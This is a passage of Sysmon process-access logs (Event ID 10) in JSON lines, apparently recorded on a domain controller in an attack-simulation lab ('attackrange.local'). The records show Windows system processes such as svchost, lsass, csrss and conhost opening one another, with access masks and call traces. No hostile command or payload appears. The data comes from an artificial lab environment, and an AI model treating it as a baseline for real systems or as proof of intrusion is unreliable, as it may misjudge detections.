C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-00107B240B00}\r\nSourceProcessId: 1476\r\nSourceThreadId: 4944\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-00107B240B00}","SourceProcessId":"1476","SourceThreadId":"4944","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00104E260B00}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\UBPM.dll+ac60|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00104E260B00}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\UBPM.dll+ac60|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00104E260B00}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00104E260B00}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\nt